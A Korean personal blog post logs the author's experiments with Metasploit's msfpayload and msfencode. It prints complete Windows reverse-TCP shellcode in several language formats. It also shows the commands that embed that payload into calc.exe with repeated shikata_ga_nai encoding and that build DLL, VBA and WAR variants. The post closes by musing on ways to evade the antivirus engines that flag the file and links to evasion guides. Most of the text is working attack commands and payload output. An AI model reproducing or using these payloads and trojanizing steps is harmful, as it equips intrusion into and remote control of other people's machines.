http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads
root@LUCKYSTRIKE:~# msfpayload -h OPTIONS: |
root@LUCKYSTRIKE:~# msfencode -h OPTIONS: -a <opt> The architecture to encode as |
root@LUCKYSTRIKE:~# msfencode -l Framework Encoders Name Rank Description |
payload 만드는데 필요한 명령 두가지와 encoder 리스트입니다.
msfpayload만 쓰셔도 되지만 특이한 경우에는 msfenocde도 사용해야하기 때문에 둘 다 언급했습니다.
다음은 msfpayload 명령을 사용해서 payload를 만드는 방식에 대한 예제입니다.
payload는 개인적으로 좋아라하는 windows/shell_reverse_tcp를 사용했습니다.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 S Name: Windows Command Shell, Reverse TCP Inline Provided by: Basic options: Description: |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 C
/* * windows/shell_reverse_tcp - 314 bytes * VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, * ReverseConnectRetries=5, EXITFUNC=process, * InitialAutoRunScript=, AutoRunScript= */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x68\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56" "\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" "\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80" "\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 P # windows/shell_reverse_tcp - 314 bytes # http://www.metasploit.com # VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, # ReverseConnectRetries=5, EXITFUNC=process, # InitialAutoRunScript=, AutoRunScript= my $buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" . "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" . "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" . "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" . "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" . "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" . "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" . "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" . "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" . "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" . "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" . "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" . "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" . "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" . "\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" . "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" . "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" . "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" . "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" . "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" . "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" . "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" . "\x6f\x6a\x00\x53\xff\xd5"; |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 y # windows/shell_reverse_tcp - 314 bytes # http://www.metasploit.com # VERBOSE=false, LHOST=192.168.126.146, LPORT=9999, # ReverseConnectRetries=5, EXITFUNC=process, # InitialAutoRunScript=, AutoRunScript= buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" + "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" + "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" + "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" + "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" + "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" + "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" + "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" + "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" + "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" + "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" + "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" + "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" + "\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" + "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" + "\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" + "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" + "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" + "\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" + "\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" + "\x6f\x6a\x00\x53\xff\xd5" |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 R | msfencode -b '\x00' buf = |
R 옵션은 Raw 형태로 출력하라는 옵션이라서 인코딩을 하지 않으면 아래와 같이 나옵니다.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J %ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u927e%u0268%u2700%u890f%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff |
JavaScript 형태는 인코딩하면 사이즈가 4배 정도 늘어납니다.
type이 js_le와 js_be가 있는데 차이가 없더군요..둘의 차이점은....좀 더 알아봐야 할 듯...-_-;;
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J | msfencode -t js_le
|
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -o reverse_shell Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_reverse_tcp Length: 314 Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"} [*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) |
type을 exe 형태로 지정해서 파일로 떨궈볼려고 했는데 안되더군요..너무 작다는 메시지만 계속 뿌립니다.
(일단 포스팅하고 삽질을 좀 더 해봐야할 듯...)
위 문제점은 아래 방법으로 해결했습니다. 히히
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -t exe -x calc.exe -k -o reverse_shell.exe -e x86/shikata_ga_nai -c 5 [*] x86/shikata_ga_nai succeeded with size 368 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 395 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 422 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 449 (iteration=5) |
http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html
-x 옵션은 지정된 템플릿을 바탕으로 실행 파일을 만들게끔 해줍니다. -k 옵션과 함께 사용해야 하며
-x 옵션 뒤에 디렉토리를 따로 지정하지 않으면 metasploit 설치 디렉토리 하위에 data/templates에 지정한 파일(calc.exe)가 있어야 합니다.
참고했던 위 페이지에서 처럼 실행해봤더니 잘 실행됨을 확인할 수 있었습니다. ㅎㅎ
msfencode에 대한 더 많은 삽질이 필요할 듯 합니다.
좀 더 알게되면 추가 포스팅해야겠습니다.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 D | msfencode -o reverse_shell.dll -t dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_reverse_tcp Length: 314 Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"} [*] x86/shikata_ga_nai succeeded with size 14365 (iteration=1) |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 V '**************************************************************
|
너무 길게 나와서 앞뒤로 짤랐습니다.
파일로도 떨궈 봤는데 사이즈가 상당히 크더군요..
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 W | msfencode -b '\x00' buf = |
war 형태로 type을 war로 지정하고 했더니 exe 형태일때랑 동일한 에러메시지가 떠서 인코딩했더니 상당히 길게 나오네요..
항상 msfpayload만 가지고 간단한 쉘코드만 작성해서 사용해봤었는데 msfencode와 같이 사용하면 꽤 괜찮다는 생각이 듭니다.
다만, msfencode로 인코딩한 파일을 제가 사용하는 빨간우산은 악성코드로 잡더군요..
바이러스토탈에 올려보니 무려 23개의 백신에서 탐지하고 있었습니다.
좀 더 공부해봐야 알겠지만 인코더나 옵션 조정하면 백신에 탐지 안되게 할 수도 있지 않을까요? 흠...
우회 관련된 참고할만한 자료
Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus
http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3
0x02 안티바이러스 피해가기
http://linux-virus.springnote.com/pages/4330985?print=1